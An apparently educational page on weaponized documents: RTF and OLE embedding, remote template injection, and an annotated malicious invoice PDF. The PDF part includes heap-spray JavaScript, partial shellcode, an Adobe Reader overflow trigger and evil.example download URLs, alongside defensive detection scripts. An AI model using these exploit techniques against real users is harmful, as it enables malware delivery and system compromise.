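Because the payload sits in plain hex inside \objdata, a defender can surface it with very little code. The sketch below lists the \objclass names an RTF declares and hex-decodes each \objdata blob to search for a marker such as "Equation". Both function names and the tiny sample document are assumptions for illustration. Real samples often break up the hex with nested control words and other obfuscation, which this naive regex does not handle; dedicated tools such as rtfobj from oletools exist for that.

```python
import re

def find_ole_classes(rtf_text):
    """Return the objclass names declared by embedded objects."""
    return re.findall(r"\\objclass\s+([^}\s]+)", rtf_text)

def objdata_contains(rtf_text, needle):
    """Hex-decode each objdata blob (whitespace ignored) and search it."""
    for blob in re.findall(r"\\objdata\s*([0-9a-fA-F\s]+)", rtf_text):
        digits = re.sub(r"\s+", "", blob)
        digits = digits[: len(digits) // 2 * 2]  # drop a dangling nibble
        if needle in bytes.fromhex(digits):
            return True
    return False

# Benign sample: an OLE header fragment naming the class, with no payload.
sample = (
    r"{\rtf1\ansi{\object\objemb{\*\objclass Equation.3}{\*\objdata " + "\n"
    "0105000002000000\n"
    "0B0000004571756174696F6E2E3300\n"
    "}}}"
)
print(find_ole_classes(sample))                 # ['Equation.3']
print(objdata_contains(sample, b"Equation"))    # True
```

An embedded Equation.3 object in an invoice is a strong signal on its own, since ordinary business documents rarely contain legacy Equation Editor objects.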

OLE Object Embedding

OLE (Object Linking and Embedding) is a Microsoft technology that lets documents contain other documents or executable content. A Word document can embed an Excel spreadsheet, a Visio diagram, a PDF, an Equation Editor object, or even a packaged executable disguised with a custom icon. When the user double-clicks the embedded object, the associated handler application launches and processes it — and that processing is where vulnerabilities live.

How it works internally: A .docx file is actually a ZIP archive. Inside it, the word/document.xml file references embedded objects by relationship ID (e.g., r:id="rId8"). The relationship file (word/_rels/document.xml.rels) maps that ID to an embedded file (e.g., word/embeddings/oleObject1.bin). That .bin file contains the OLE structured storage with the actual exploit payload — it could be an Equation Editor exploit, a Flash SWF, an ActiveX control, or a packaged .exe with a fake PDF icon. When Word processes this document, it reads the ProgID attribute to determine which COM server to launch for the object — and that server is the vulnerable target.

document.xml — inside .docx (unzipped)

<!-- .docx files are ZIP archives containing XML -->
<!-- This is from word/document.xml -->

<w:body>
  <w:p><w:r><w:t>Please review the attached report.</w:t></w:r></w:p>

  <!-- Normal paragraph above, but then... -->

  <w:p>
    <w:r>
      <w:object>
        <o:OLEObject
          Type="Embed"
          ProgID="Package"
          ShapeID="_x0000_i1025"
          DrawAspect="Icon"
          ObjectID="_1234567890"
          r:id="rId8" />          ◄ Embedded object
      </w:object>
    </w:r>
  </w:p>
</w:body>

<!-- The relationship file (word/_rels/document.xml.rels) maps rId8 -->
<!-- to an embedded object in word/embeddings/oleObject1.bin -->
<!-- That .bin can contain: -->
<!--   • An Equation Editor exploit (CVE-2017-11882) -->
<!--   • A Flash SWF exploit -->
<!--   • An ActiveX control that downloads malware -->
<!--   • A packaged .exe disguised as a PDF icon -->

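For remote template injection, instead of embedding the payload directly, the attacker uses an external relationship. In a real .docx the attached-template relationship lives in word/_rels/settings.xml.rels and is referenced from word/settings.xml:

word/_rels/settings.xml.rels (remote template)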

<Relationships>
  <Relationship Id="rId1" Type="...normal-template..." 
    Target="file:///Normal.dotm" />

  <Relationship Id="rId8"
    Type="...attachedTemplate..."
    Target="https://evil.example/template.dotm"
    TargetMode="External" />     ◄ Fetches from attacker server!
</Relationships>

<!-- When Word opens this document, it automatically -->
<!-- fetches template.dotm from the attacker's server. -->
<!-- The template contains the actual macro/exploit. -->
<!-- The original .docx file is CLEAN — no detections! -->

🧩 Why This Evades Detection The .docx itself contains no malicious code, just a URL. A static scan that looks for macros or exploit bytes finds nothing, although a scanner that inspects external relationships can still flag the remote template. Only when Word opens the document and fetches the remote template does the exploit load. By then, the static scan has already passed.
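The URL is the one artifact this technique cannot hide, so it is what a defender should look for. The sketch below opens a .docx as a ZIP archive and reports every relationship marked TargetMode="External" in any .rels part. The function name and the in-memory sample are assumptions for illustration. Ordinary hyperlinks are also external relationships, so results need filtering by Type; for untrusted files a hardened XML parser (for example the third-party defusedxml package) would be a safer choice than the standard library parser used here.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def external_relationships(docx_bytes):
    """Return (part name, relationship type, target) for external targets."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found

# Build a minimal in-memory archive containing only the relationship part.
TEMPLATE_TYPE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
rels_xml = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    f'<Relationship Id="rId1" Type="{TEMPLATE_TYPE}" '
    'Target="https://evil.example/template.dotm" TargetMode="External"/>'
    "</Relationships>"
)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/_rels/settings.xml.rels", rels_xml)
sample_docx = buffer.getvalue()

for part, rel_type, target in external_relationships(sample_docx):
    print(part, rel_type.rsplit("/", 1)[-1], target)
```

A relationship whose type ends in attachedTemplate and whose target is an http(s) URL is rare in legitimate documents and is worth blocking or alerting on.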

PDF Exploit Lifecycle — From Open to Owned

When a victim opens a weaponized PDF, the following chain of events fires automatically. Each phase takes milliseconds. The entire sequence — from file open to full code execution — completes in under 2 seconds. The user sees a normal invoice on screen the entire time.

📂 PDF Opens +0.0s

Reader parses all objects starting from the trailer, finds the Catalog (Object 1), builds the page tree, and loads fonts and content streams. The invoice renders on screen — everything looks normal. The user has no idea that the Catalog contains a hidden trigger.

⚡ /OpenAction Fires +0.1s

Reader finds /OpenAction 7 0 R in the Catalog. This tells Reader: "as soon as the document opens, execute the action in Object 7." Object 7 is a JavaScript action that references a compressed payload stream. No click is required: the PDF specification explicitly allows this for "convenience features" like auto-print.

🧱 Heap Spray +0.3s

Reader decompresses Object 9 (/FlateDecode) and executes the JavaScript inside. The script decodes shellcode from hex/unicode encoding, then allocates 200 JavaScript string objects, each ~1MB, filling ~200MB of heap memory with NOP-sled + shellcode copies. The heap is now a minefield: almost any address the CPU jumps to will land on attacker-controlled data.

💥 Vulnerability Trigger +0.8s

The JavaScript calls Collab.collectEmailInfo({subj: "A".repeat(0x4141)}). This Reader API has a stack buffer overflow — the oversized subject string (16,705 bytes) overwrites past the 256-byte buffer boundary, corrupting the saved frame pointer (EBP) and the return address (EIP) on the stack.

🎯 EIP Hijack +1.0s

The attacker overwrites EIP with 0x0C0C0C0C, an address inside the sprayed heap region. When the vulnerable function executes ret, the CPU jumps to 0x0C0C0C0C. Because the heap is filled with NOP-sled + shellcode, the CPU lands on sled bytes (0x0C 0x0C, which decode as the harmless OR AL, 0x0C rather than a classic 0x90 NOP), slides forward through the sled, and hits the shellcode. The attacker now controls execution.

💀 Shellcode Execution +1.8s

The shellcode executes inside the AcroRd32.exe process. It walks the PEB (Process Environment Block) to find kernel32.dll, resolves LoadLibraryA and GetProcAddress via ROR-13 hash, then calls URLDownloadToFileA to download a Cobalt Strike beacon from the attacker's C2 server. The beacon installs as a service and phones home. Full compromise — in under 2 seconds.

⚠ The User Experience vs. What Actually Happened What the user saw: Opened an email attachment. An invoice appeared in Adobe Reader showing "INVOICE #2024-0342 — Acme Corp — Total Due: $4,250.00." Nothing unusual. They closed the file and went back to work.

What actually happened: In 1.8 seconds: Reader parsed the Catalog → found /OpenAction → decompressed 4,821 bytes of JavaScript → the script decoded shellcode from hex → sprayed 200MB of heap with NOP+shellcode → called Collab.collectEmailInfo with a 16,705-byte string → buffer overflow overwrote EIP with 0x0C0C0C0C → CPU jumped to sprayed heap → NOP sled → shellcode walked PEB → resolved kernel32 APIs → downloaded beacon.exe → Cobalt Strike C2 channel established. The attacker now has a persistent foothold inside the corporate network.

The Complete Weaponized PDF — Annotated Line by Line

Below is the complete source code of a weaponized PDF file with every single object annotated. The 8 numbered comments reveal exactly where the attacker planted each trap. A legitimate PDF only needs Objects 1-6. Objects 7, 8, and 9 are the weapons the attacker added.

invoice_2024.pdf — complete annotated source (malicious)

%PDF-1.4

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ① THE TRAP DOOR (/OpenAction)
   This is Object 1 — the Catalog — the root
   of the entire PDF. It looks normal except
   for ONE added line: /OpenAction 7 0 R
   This tells the reader: "When you open this
   file, IMMEDIATELY execute whatever Object 7
   says to do." The user never sees this happen.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R              ← normal: points to the page tree
  /OpenAction 7 0 R         ← ★ THE TRAP: auto-execute Object 7 on file open
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ② THE VISIBLE PAGES (Objects 2-6)
   These are 100% legitimate. They define the
   invoice the user sees on screen — fonts,
   layout, text content. Nothing suspicious.
   They exist solely to make the file look real.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

2 0 obj
<<
  /Type /Pages
  /Kids [3 0 R]
  /Count 1
>>
endobj

3 0 obj
<<
  /Type /Page
  /Parent 2 0 R
  /MediaBox [0 0 612 792]   ← US Letter size (612×792 points)
  /Contents 4 0 R
  /Resources << /Font << /F1 5 0 R >> >>
>>
endobj

4 0 obj                              ← page content stream (the visible invoice text)
<< /Length 342 >>
stream
BT
/F1 16 Tf 50 750 Td (INVOICE #2024-0342) Tj
/F1 10 Tf 50 720 Td (Acme Corp) Tj
50 700 Td (Total Due: $4,250.00) Tj
ET
endstream
endobj

5 0 obj                              ← font definition
<<
  /Type /Font
  /Subtype /Type1
  /BaseFont /Helvetica
>>
endobj

6 0 obj                              ← font descriptor (optional)
<<
  /Type /FontDescriptor
  /FontName /Helvetica
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ③ THE WEAPON (Object 7 — JavaScript Action)
   This is what /OpenAction points to.
   It tells the reader: "Run this JavaScript."
   The /JS key contains the actual code, and
   /Next names the action to run afterwards
   (Object 8 runs once Object 7 has been invoked).
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

7 0 obj
<<
  /Type /Action
  /S /JavaScript             ← action type: execute JavaScript
  /JS 9 0 R                  ← the JavaScript code is in Object 9 (compressed)
  /Next 8 0 R                ← then run Object 8 (actions chained by /Next run in sequence)
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ④ THE EMBEDDED URL (Object 8: Chained Action)
   Runs after Object 7 through the /Next chain.
   Some PDF readers block JS but still allow
   URI actions, so this path can work without it.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

8 0 obj
<<
  /Type /Action
  /S /URI
  /URI (https://evil.example/stage2.exe)   ← direct download fallback
>>
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⑤ THE SHELLCODE + ⑥ NOP SLED + ⑦ HEAP SPRAY
   Object 9 is the compressed JavaScript stream.
   When decompressed (FlateDecode), it reveals
   the full exploit payload: shellcode definition,
   NOP sled generation, heap spray execution,
   and the vulnerability trigger function call.
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

9 0 obj
<<
  /Length 4821
  /Filter /FlateDecode       ← compressed! Use pdf-parser to decompress
>>
stream
[...4,821 bytes of zlib-compressed JavaScript...
 When decompressed, this becomes the heap spray + trigger
 code shown in the "JS Heap Spray" section below         ]
endstream
endobj

/* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⑧ THE TRIGGER (xref + trailer)
   The cross-reference table tells the reader
   where each object starts (byte offsets).
   The trailer points to the Catalog (Object 1)
   which starts the entire chain:
   Trailer → Catalog → /OpenAction → Object 7
   → JavaScript → Object 9 → Heap Spray →
   Trigger Overflow → EIP Hijack → Shellcode
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */

xref
0 10
0000000000 65535 f       ← Object 0 (free — always present)
0000000009 00000 n       ← Object 1 at byte 9 (Catalog + trap)
0000000115 00000 n       ← Object 2 at byte 115 (Pages)
0000000169 00000 n       ← Object 3 at byte 169 (Page)
0000000330 00000 n       ← Object 4 at byte 330 (visible content)
0000000721 00000 n       ← Object 5 at byte 721 (font)
0000000805 00000 n       ← Object 6 at byte 805 (font descriptor)
0000000889 00000 n       ← Object 7 at byte 889 (★ JS Action)
0000001052 00000 n       ← Object 8 at byte 1052 (★ URI fallback)
0000001188 00000 n       ← Object 9 at byte 1188 (★ compressed payload)

trailer
<<
  /Size 10
  /Root 1 0 R                ← Start here → Catalog → /OpenAction → BOOM
>>
startxref
6009                         ← byte offset of the xref table itself
%%EOF

📊 The Object Map Summary

Legitimate: Objects 1-6 (Catalog, Pages, Page, Content, Font, FontDescriptor) — these render the invoice
Malicious: Object 7 (JS Action), Object 8 (URI Fallback), Object 9 (Compressed Payload) — these run the exploit
The Connection: One line in Object 1 (/OpenAction 7 0 R) bridges the gap between "document" and "weapon"
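The cross-reference table is also a quick way to spot the oversized object without reading the whole file. The sketch below parses a classic xref table into object offsets and estimates each object's size from the gap to the next offset. The function names are illustrative, and the size estimate assumes objects are stored in offset order with the xref table directly after the last one, which holds for the listing above but not for every PDF (incremental updates and cross-reference streams break it).

```python
def parse_xref(section):
    """Map object number -> byte offset for in-use entries of a classic xref table."""
    lines = [ln.strip() for ln in section.splitlines() if ln.strip()]
    if not lines or lines[0] != "xref":
        raise ValueError("not a classic xref table")
    offsets = {}
    i = 1
    while i < len(lines):
        start, count = (int(x) for x in lines[i].split())
        for k, entry in enumerate(lines[i + 1 : i + 1 + count]):
            offset, _generation, kind = entry.split()
            if kind == "n":  # 'f' marks a free entry such as object 0
                offsets[start + k] = int(offset)
        i += 1 + count
    return offsets

def object_spans(offsets, startxref):
    """Estimate each object's size as the distance to the next offset."""
    ordered = sorted(offsets.items(), key=lambda item: item[1])
    ends = [off for _, off in ordered[1:]] + [startxref]
    return {num: end - off for (num, off), end in zip(ordered, ends)}

XREF = """
xref
0 10
0000000000 65535 f
0000000009 00000 n
0000000115 00000 n
0000000169 00000 n
0000000330 00000 n
0000000721 00000 n
0000000805 00000 n
0000000889 00000 n
0000001052 00000 n
0000001188 00000 n
"""
spans = object_spans(parse_xref(XREF), startxref=6009)
print(spans)
print(max(spans, key=spans.get))  # 9
```

With the offsets from the annotated file, Object 9 spans 4,821 bytes while every other object is under 400, which is the size anomaly the summary above describes.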

The JavaScript Heap Spray — Step by Step

This is what's hiding inside Object 9 after decompression. Each of the 8 steps is annotated to show exactly what the JavaScript does, why it does it, and the math behind each operation.

decoded_object9.js — the decompressed heap spray payload (8 steps)

// ═══════════════════════════════════════════════════
// STEP ① — THE SHELLCODE (the actual weapon)
// This is raw machine code encoded as a JavaScript
// string using %u (unicode escape) format.
// When decoded: FC E8 82 00 00 00 60 89 E5 31 C0...
// This code downloads & executes a remote payload.
// ═══════════════════════════════════════════════════

var shellcode = unescape(
    "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30" +
    "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac" +
    "%u7c61%u2c02%ucf20%u0dc1%uc701%uf2e2%u5752%u528b" +
    "%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059"
    /* ... ~340 bytes total when decoded ... */
);

// MATH: Each %uXXYY = 2 bytes. The string has ~170
// %u sequences → 170 × 2 = 340 bytes of machine code.
// In memory: FC E8 82 00 00 00 60 89 E5 31 C0 64...

// ═══════════════════════════════════════════════════
// STEP ② — THE NOP SLED (the landing zone)
// 0x0C = the NOP-equivalent byte. As a %u escape,
// two 0x0C bytes = %u0c0c. This creates a tiny seed
// string of NOP bytes that we'll exponentially grow.
// ═══════════════════════════════════════════════════

var junk_code = unescape("%u0c0c%u0c0c");

// Result: 4 bytes → 0C 0C 0C 0C
// This is the "seed" — we double it until it's huge.

// ═══════════════════════════════════════════════════
// STEP ③ — NOP SLED EXPANSION (exponential doubling)
// We double the NOP string in a loop until it reaches
// 0x40000 (262,144) bytes. This takes only ~16 loops
// because 4 × 2^16 = 262,144. Exponential growth!
// ═══════════════════════════════════════════════════

while (junk_code.length < 0x40000) {
    junk_code += junk_code;   // double the string each iteration
}
// Loop trace:
//   Start:  4 bytes
//   Loop 1: 8 bytes        (4+4)
//   Loop 2: 16 bytes       (8+8)
//   Loop 3: 32 bytes       (16+16)
//   ...     (doubles each iteration)
//   Loop 16: 262,144 bytes (0x40000) → STOP
// Total: 262,144 bytes = 256 KB of 0C 0C 0C 0C...

// ═══════════════════════════════════════════════════
// STEP ④ — ASSEMBLING THE SPRAY BLOCK
// Each block = NOP sled (from step 3) + shellcode.
// We trim the NOP sled so the total = exactly 0x40000
// (256 KB by this listing's byte count).
// Block structure: [0C0C0C...×(256KB-340B)] [shellcode]
// ═══════════════════════════════════════════════════

var spray_block = junk_code.substring(0, 0x40000 - shellcode.length);

// MATH: 0x40000 = 262,144 bytes
// 262,144 - 340 (shellcode) = 261,804 bytes of NOP sled
// NOP % = 261,804 / 262,144 = 99.87% landing zone!

spray_block += shellcode;   // append the weapon at the end

// Result: [0C 0C 0C 0C ... × 261,804 bytes ...] [FC E8 82 00 ...]
//          ← NOP sled (safe landing zone) →     ← shellcode →

// ═══════════════════════════════════════════════════
// STEP ⑤ — SPRAYING THE HEAP (filling memory)
// We create 200 copies of the spray block in a JS
// array. Each copy gets its own heap allocation.
// 200 × 262,144 = 52,428,800 bytes ≈ 50MB minimum
// (JS string overhead pushes actual usage to ~200MB)
// ═══════════════════════════════════════════════════

var spray_array = new Array();
for (var i = 0; i < 200; i++) {
    spray_array[i] = spray_block.substring(0, spray_block.length);
}

// Each spray_array[i] holds a unique copy of the spray block.
// .substring(0, length) forces a NEW string allocation each time
// (prevents JS engine from just sharing a reference).
//
// After this loop, the process heap looks like:
// [block 0][block 1][block 2]...[block 199]
// Each block = 256KB of NOP+shellcode
// Total sprayed = 200 × 256KB = ~50MB of raw data
// With JS overhead: ~200MB of heap consumed

// ═══════════════════════════════════════════════════
// STEP ⑥ — THE TARGET ADDRESS CHECK
// Address 0x0C0C0C0C = 202,116,108 decimal
// = ~192.75 MB into the virtual address space.
// The attacker is betting that ~200MB of spray reaches
// past that address: a likely hit, not a guaranteed one.
// ═══════════════════════════════════════════════════

// ═══════════════════════════════════════════════════
// STEP ⑦ — TRIGGER THE VULNERABILITY
// Now we call a VULNERABLE Adobe Reader API with
// a string that's way too long. This overflows an
// internal buffer and overwrites EIP with 0x0C0C0C0C
// (which is inside our sprayed heap region).
// ═══════════════════════════════════════════════════

var evil_string = "";
for (var j = 0; j < 16705; j++) {
    evil_string += unescape("%u0c0c%u0c0c");   // fill with target address
}
// evil_string = 16,705 × 4 = 66,820 bytes of "0C 0C 0C 0C"
// This is WAY more than the internal buffer can hold.
// The overflow writes 0x0C0C0C0C over saved EIP on the stack.

Collab.collectEmailInfo({subj: evil_string});

// ═══════════════════════════════════════════════════
// STEP ⑧ — WHAT HAPPENS NEXT (automatic)
// 1. collectEmailInfo's internal buffer overflows
// 2. Saved EIP on stack → overwritten with 0x0C0C0C0C
// 3. Function returns → CPU jumps to 0x0C0C0C0C
// 4. Address 0x0C0C0C0C is inside our sprayed heap!
// 5. CPU executes NOP sled (0C 0C 0C 0C...)
// 6. NOP sled slides to shellcode
// 7. Shellcode: downloads and runs attacker's payload
// 8. Game over — attacker has code execution
// ═══════════════════════════════════════════════════

🔗 Connecting the Dots

The PDF file (annotated above) contains Object 9 with 4,821 bytes of compressed data. When Adobe Reader decompresses it, the JavaScript code above is what executes. Steps ①-⑤ prepare the heap, Step ⑦ triggers the overflow, and Step ⑧ happens automatically. The entire process takes under 2 seconds. The user sees nothing but an invoice.
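The sizing figures quoted in the comments above can be re-derived with a few lines of arithmetic. The sketch below is illustrative only: the constant names are invented for this example, and the values are the ones stated in the walkthrough (256 KB blocks, 340 bytes of shellcode, 200 copies, target 0x0C0C0C0C). It performs no allocation and touches no PDF.

```python
# Re-derive the heap-spray sizing figures quoted in the walkthrough.
# Pure arithmetic: nothing here allocates memory or touches a PDF.

BLOCK_BYTES = 262_144        # one spray block (256 KiB), from the comments
SHELLCODE_BYTES = 340        # shellcode length assumed in the comments
BLOCK_COUNT = 200            # number of copies in the spray array
TARGET_ADDR = 0x0C0C0C0C     # address written over the return pointer

sled_bytes = BLOCK_BYTES - SHELLCODE_BYTES
sled_fraction = sled_bytes / BLOCK_BYTES
raw_total = BLOCK_COUNT * BLOCK_BYTES
target_mib = TARGET_ADDR / 2**20

print(f"sled per block : {sled_bytes:,} bytes ({sled_fraction:.2%})")
print(f"raw spray total: {raw_total:,} bytes ({raw_total / 2**20:.0f} MiB)")
print(f"target address : {TARGET_ADDR:,} decimal ({target_mib:.2f} MiB)")
```

The last line is the useful cross-check: 0x0C0C0C0C is 202,116,108 in decimal, about 192.75 MiB, which sits inside the 50 to 250 MB range the spray is described as covering.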

🔬 Exploit Workshop — Build Every Component Step by Step

Four interactive labs. Each one lets you type real values and watch them appear in the exploit code — showing exactly how each component is built. Left side = safe/normal, right side = exploited. Everything is static text rendered in your browser. Nothing executes. Nothing touches your PC.

Buffer Overflow is the foundation of many memory corruption exploits. A program allocates a fixed-size buffer on the stack, but copies user input without checking length. The attacker sends more data than the buffer can hold, overwriting the saved return address (the value the CPU loads into EIP when the function returns) with a pointer to their shellcode. When the function returns, the CPU jumps to the attacker's code instead of back to the caller. Below: the vulnerable C code on the left, the generated exploit payload + stack visualization on the right. Change the values and watch everything update live.

Buffer Size (bytes)

Return Addr (hex)

NOP Sled Byte

Payload Text

✅ VULNERABLE C CODE (the target program)

#include <stdio.h>
#include <string.h>

// THE GOAL: Attacker wants to force
// the CPU to run this function.
// In reality = shellcode download.
void download_malware() {
    printf("COMPROMISED!\n");
}

// THE VULNERABLE FUNCTION
void parse_document(char *data) {
    char title_buffer[64];

    // ⚠ THE VULNERABILITY:
    // No length check before copy!
    strcpy(title_buffer, data);
    // strcpy copies until \0 — if data
    // is longer than 64, it overflows
    // into the stack frame above.

    printf("Title: %s\n", title_buffer);
}

int main(int argc, char *argv[]) {
    // App receives "document" data
    parse_document(argv[1]);
    return 0;
}

// Normal input:  "Quarterly Report"
//   → fits in 64 bytes, no overflow
//
// Attacker input: 64 bytes of junk
//   + 4 bytes (saved EBP)
//   + 4 bytes (return address → shellcode)
//   + NOP sled + shellcode
//
// When parse_document returns, EIP is
// hijacked → CPU runs shellcode.

💀 CRAFTED EXPLOIT INPUT (what attacker sends)

📊 Stack Memory — Before vs After Overflow

BEFORE (normal input "Quarterly Report")

AFTER (attacker's crafted input)

What just happened? The attacker sent 72 bytes. The first 64 bytes ("A"s) fill the buffer. The next 4 bytes overwrite the saved EBP (frame pointer). The next 4 bytes (0x0c0c0c0c) overwrite the return address — when parse_document() executes ret, the CPU jumps to 0x0c0c0c0c instead of returning to main(). That address points to the NOP sled in the heap-sprayed memory, which slides into the shellcode. Game over.
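The 64 + 4 + 4 layout described above can be modeled without any native code. The following is a minimal sketch, not a reproduction of the lab's own logic: it treats the stack frame as a 72-byte Python bytearray, and the frame-pointer and return-address values are made up for the model. It contrasts a copy that ignores the buffer size with one that checks it first, which is the fix for the vulnerable `strcpy` call.

```python
import struct

BUF_SIZE = 64                      # matches char title_buffer[64]
SAVED_EBP = 0x0012FF80             # made-up frame pointer for the model
RETURN_TO_MAIN = 0x00401234        # made-up legitimate return address

def new_frame():
    """Model the frame as: 64-byte buffer | saved EBP | saved return address."""
    return bytearray(BUF_SIZE) + struct.pack("<II", SAVED_EBP, RETURN_TO_MAIN)

def unchecked_copy(frame, data):
    """Mimic strcpy: copy every byte, ignoring where the buffer ends."""
    n = min(len(data), len(frame))  # the model only tracks these 72 bytes
    frame[:n] = data[:n]

def checked_copy(frame, data):
    """Bounded copy: refuse input that does not fit (leaving room for NUL)."""
    if len(data) >= BUF_SIZE:
        raise ValueError(f"input is {len(data)} bytes, buffer holds {BUF_SIZE - 1}")
    frame[:len(data)] = data

def saved_return(frame):
    """Read back the 4-byte little-endian return address slot."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

frame = new_frame()
unchecked_copy(frame, b"Quarterly Report")
print(hex(saved_return(frame)))     # return address untouched

frame = new_frame()
unchecked_copy(frame, b"A" * 72)    # 64 + 4 + 4 bytes, as in the text
print(hex(saved_return(frame)))     # slot now holds the input bytes
```

Calling `checked_copy(new_frame(), b"A" * 72)` raises `ValueError` instead of touching the frame, which is the behavior a length check before the copy would give the C program.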

PDF Weaponization Workshop — Two identical PDFs side by side. The left one stays clean forever. The right one becomes a weapon as you click each tag button below. Each button adds a real PDF exploit tag — you'll see the exact code change in real time, plus the encoded version hackers actually use. Every tag shows: what it does, how it's encoded, the math behind byte offsets, and a before/after text example. Everything is static text. Nothing executes.

CLICK EACH TAG TO INJECT IT INTO THE WEAPONIZED PDF →

Alert Message

Payload URL

Spray Count

NOP Byte

Unchanged Added this step Added earlier Modified

📄 CLEAN.PDF — Original (never changes)

%PDF-1.4

%% Object 1: Catalog (root of document)
1 0 obj
<<
  /Type /Catalog
  /Pages 2 0 R
>>
endobj

%% Object 2: Page Tree
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj

%% Object 3: Page definition
3 0 obj
<< /Type /Page /Parent 2 0 R
   /MediaBox [0 0 612 792]
   /Contents 5 0 R
   /Resources << /Font << /F1 4 0 R >> >> >>
endobj

%% Object 4: Font
4 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /Helvetica >>
endobj

%% Object 5: Page content stream
5 0 obj
<< /Length 194 >>
stream
BT /F1 24 Tf 100 700 Td
  (INVOICE #2024-0582) Tj
  /F1 11 Tf 0 -30 Td (Acme Corp) Tj
  0 -20 Td (Date: March 15, 2024) Tj
  0 -40 Td (Security Audit ... $4,500) Tj
  0 -18 Td (Pen Test .......... $3,200) Tj
  0 -18 Td (Report ............ $1,800) Tj
  0 -25 Td /F1 13 Tf (TOTAL: $9,500) Tj
ET
endstream
endobj

%% Object 6: Document Info
6 0 obj
<< /Title (Invoice) /Author (Acme Corp) >>
endobj

%% Cross-Reference Table
xref
0 7
0000000000 65535 f
0000000009 00000 n  ← Obj 1 at byte 9
0000000058 00000 n  ← Obj 2 at byte 58
0000000115 00000 n  ← Obj 3 at byte 115
0000000266 00000 n  ← Obj 4 at byte 266
0000000333 00000 n  ← Obj 5 at byte 333
0000000580 00000 n  ← Obj 6 at byte 580
trailer
<< /Size 7 /Root 1 0 R /Info 6 0 R >>
startxref 663
%%EOF

💀 WEAPON.PDF — Step ⓪: Identical Copy

🧮 The Math — Byte Offset Calculations

Heap Spray fills the process's heap memory with hundreds of megabytes of attacker-controlled data. Each block contains a long NOP sled followed by the shellcode. The classic sled byte is 0x90 ("no operation": the CPU does nothing and moves to the next byte); the PDF spray shown earlier uses 0x0C instead, because the byte pair 0C 0C decodes as OR AL, 0x0C, which is harmless in this context and lets the same value serve as both sled and target address. When the buffer overflow hijacks EIP to an address like 0x0c0c0c0c, it lands somewhere in the sprayed heap. The NOP sled "catches" the jump: wherever in the sled it lands, the CPU slides forward until it hits the shellcode. Change the values below and watch the JavaScript code + memory visualization update.

Spray Blocks

Block Size (hex)

NOP Byte (hex)

Target Addr

🧱 HEAP SPRAY JAVASCRIPT (runs inside PDF)

📊 HEAP MEMORY LAYOUT AFTER SPRAY

App data Free NOP sled Shellcode

Shellcode is raw machine code: the CPU executes it directly, with no compiler and no interpreter in between. Each x86 instruction is encoded as one or more bytes (FC is cld, 31 C0 is xor eax, eax). The attacker crafts these bytes to perform specific actions: find kernel32.dll in memory, resolve API addresses, call WinExec or URLDownloadToFile. Below is an educational representation: the hex bytes map to real x86 instructions, annotated so you can see what each instruction does. This is display-only. Nothing executes.

Payload Action (demo)

🔩 SHELLCODE — Hex Dump + x86 Instructions

📖 INSTRUCTION-BY-INSTRUCTION WALKTHROUGH

How it connects: This shellcode sits at the end of each NOP-sled block in the heap spray (Tab 3). When the buffer overflow (Tab 1) hijacks EIP → the CPU lands in the heap → slides through NOPs → hits these bytes → executes the instructions above → calc.exe launches. In a real exploit, this would be cmd.exe /c powershell -ep bypass -c "IEX(...)" downloading a RAT. In our demo, it just opens Calculator. The entire chain: Buffer Overflow → Heap Spray → Shellcode → Payload.

🔴 Live Exploit Demonstration — Build a complete weaponized PDF from scratch, step by step. Both PDFs start identical. At each step you provide the attacker's input data — the system validates it, generates the fully encoded/obfuscated version (FUD), and injects it into the weapon PDF live. You'll see every technique: buffer overflow setup, heap spray, shellcode embedding, PDF tag injection, FlateDecode compression, and xref recalculation — all unified into one flowing demo. The left PDF and left preview never change. Static text only. Nothing executes.

📄 CLEAN.PDF — Original (never changes)

💀 WEAPON.PDF — Step ⓪: Identical Copy

CLEAN

INVOICE #2024-0582

Acme Corp — Consulting Services
Date: March 15, 2024

Service	Amount
Security Audit	$4,500
Pen Test	$3,200
Report	$1,800
TOTAL	$9,500

✓ 6 obj · 0 JS · 0 actions · 663 bytes · SAFE

⚡ Generated Exploit Code — Full Chain

Step ⓪ — No exploit code yet. Click each step and inject data to build the full exploit chain.

🏷️ Injected Techniques

No techniques injected yet. Start at Step ① →

